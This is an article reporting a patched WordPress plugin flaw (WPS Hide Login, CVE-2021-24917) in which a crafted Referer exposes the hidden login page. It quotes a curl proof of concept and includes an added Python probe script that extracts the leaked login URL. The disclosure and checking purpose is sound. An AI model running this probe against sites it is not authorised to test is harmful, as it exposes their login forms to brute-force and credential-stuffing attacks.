The WPS Hide Login WordPress plugin recently patched a vulnerability that exposed users’ secret login pages. The vulnerability allowed an unauthenticated attacker to bypass the plugin’s primary function of hiding the login page, exposing the site to brute-force and credential-stuffing attacks against the login form.
Essentially, the vulnerability completely undermined the intended purpose of the plugin, which is to hide the WordPress login page.
WPS Hide Login
The WPS Hide Login security plugin protects WordPress sites from login attacks by moving the administrator login page to a custom URL and making the default wp-admin directory and wp-login.php page inaccessible to visitors who are not logged in. It is used by over one million websites to add an extra layer of security.
Keeping hackers and automated bots away from the default login page doesn’t necessarily require a plugin. An alternative is to install WordPress into a subdirectory with a random name. Bots that target the default login URL will then fail to find it.
Instead of appearing at /wp-login.php, the login page is effectively hidden at /random-directory-name/wp-login.php. Bots generally expect the login page at its default location and do not search for it elsewhere.
WPS Hide Login is especially useful for sites with WordPress installed in the root directory, i.e., example.com/.
Report of Vulnerability
The vulnerability was publicly reported on the plugin’s support page. A user noted that if the main home page is redirected, appending a specific filename to the redirected URL will expose the hidden login page’s URL.
User Explanation
“For example, with the following domain: sub.domain.com, if domain.com redirects to sub.domain.com, there is a bypass:
Entering the URL domain.com and adding /wp-admin/options.php will redirect to sub.domain.com/changedloginurl, revealing the login URL and allowing log in.”
Security Site Published a Proof of Concept
WPScan, a WordPress security organization, published a proof of concept: a minimal request that demonstrates the vulnerability is real and reproducible.
Security Researchers’ Publication
“The plugin has a bug that allows access to the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user.
Proof of Concept:
curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302 ”
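The curl one-liner above only shows the 302 status; the secret slug is carried in the Location header of that response. The script below, added here as an illustration and not code from the article, WPScan or the plugin, issues the same request (GET /wp-admin/options.php with an arbitrary Referer, redirects not followed) and reads the redirect target. It also works offline on constructed sample responses. The function names, the sample responses and the assumption that the redirect target carries WordPress core’s redirect_to and reauth parameters are this example’s own.

```python
"""Check for the WPS Hide Login referer bypass (CVE-2021-24917, fixed in 1.9.1).

Added example, not code from the article, WPScan or the plugin. It mirrors the
published curl PoC: GET /wp-admin/options.php with a random Referer and no
redirect following, then inspect the Location header for the hidden login URL.
"""
import urllib.error
import urllib.request
from urllib.parse import urlsplit, urlunsplit

DEFAULT_LOGIN = "wp-login.php"

# Assumption: WordPress core's auth_redirect() appends these parameters to the
# login URL it redirects to. They are stripped so the bare hidden slug is shown.
CORE_LOGIN_PARAMS = ("redirect_to=", "reauth=")


def leaked_login_url(status, headers):
    """Return the hidden login URL revealed by a response, or None.

    status  - HTTP status code of the response to /wp-admin/options.php
    headers - response headers as a dict (case-insensitive lookup is done here)
    """
    if status not in (301, 302, 303, 307, 308):
        return None  # patched plugin or a hard error: no redirect to inspect
    lowered = {k.lower(): v for k, v in headers.items()}
    location = lowered.get("location")
    if not location:
        return None
    parts = urlsplit(location)
    if parts.path.rstrip("/").endswith(DEFAULT_LOGIN):
        return None  # stock wp-login.php: nothing is hidden, nothing leaked
    query = "&".join(
        p for p in parts.query.split("&")
        if p and not p.startswith(CORE_LOGIN_PARAMS)
    )
    if parts.path in ("", "/") and not query:
        return None  # plain redirect to the home page carries no slug
    # With pretty permalinks the slug is a path (/slug/); without them it is a
    # query string (/?slug). Both survive the cleanup above.
    return urlunsplit((parts.scheme, parts.netloc, parts.path, query, ""))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Suppress redirect following so the 302 and its Location stay visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(site, referer="something", timeout=10):
    """Send the PoC request to a live site; return the leaked URL or None."""
    req = urllib.request.Request(
        site.rstrip("/") + "/wp-admin/options.php",
        headers={"Referer": referer, "User-Agent": "wps-hide-login-check"},
        method="GET",
    )
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return leaked_login_url(resp.status, dict(resp.headers))
    except urllib.error.HTTPError as err:
        # With redirects suppressed urllib raises on 3xx (and on 4xx); the
        # status and headers are still available on the exception.
        return leaked_login_url(err.code, dict(err.headers))


# Constructed sample responses for offline use (not captured from a real site).
SAMPLE_VULNERABLE = (302, {
    "Location": "https://example.com/?hiddenslug"
                "&redirect_to=https%3A%2F%2Fexample.com%2Fwp-admin%2Foptions.php&reauth=1",
})
SAMPLE_VULNERABLE_PERMALINKS = (302, {
    "Location": "https://example.com/hiddenslug/"
                "?redirect_to=https%3A%2F%2Fexample.com%2Fwp-admin%2Foptions.php&reauth=1",
})
SAMPLE_STOCK_WORDPRESS = (302, {
    "Location": "https://example.com/wp-login.php"
                "?redirect_to=https%3A%2F%2Fexample.com%2Fwp-admin%2Foptions.php&reauth=1",
})
SAMPLE_PATCHED = (403, {})


if __name__ == "__main__":
    for name, (status, headers) in {
        "vulnerable (query slug)": SAMPLE_VULNERABLE,
        "vulnerable (permalink slug)": SAMPLE_VULNERABLE_PERMALINKS,
        "stock WordPress": SAMPLE_STOCK_WORDPRESS,
        "patched": SAMPLE_PATCHED,
    }.items():
        print(f"{name}: {leaked_login_url(status, headers)}")
    # To test a site you are authorised to assess: print(probe("https://example.com"))
```

Run it as-is to see the four sample outcomes; `probe()` is only needed against a live site. A result of None from `probe()` means either the plugin is patched (no redirect, or a redirect to the stock wp-login.php page) or the site does not use a hidden login slug at all.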
The United States government’s National Vulnerability Database rated the vulnerability as High severity, with a CVSS base score of 7.5 on a 10-point scale.
WPS Hide Login Vulnerability Patched
The publishers of the WPS Hide Login plugin have addressed this issue in version 1.9.1.
According to the WPS Login Changelog
“1.9.1
Fix: bypass security issue allowing an unauthenticated user to get login page by setting a random referer string via curl request.”
Users of the affected plugin should update to version 1.9.1 or later so that their login page is actually hidden.
Citations
US Government National Vulnerability Database
- CVE-2021-24917 Detail
WPScan Report of WPS Hide Login Vulnerability
- WPS Hide Login < 1.9.1 – Protection Bypass with Referer-Header
Plugin Report of Vulnerability
- Bypass-SECURITY ISSUE!!!
Official Plugin Changelog
- WPS Hide Login Changelog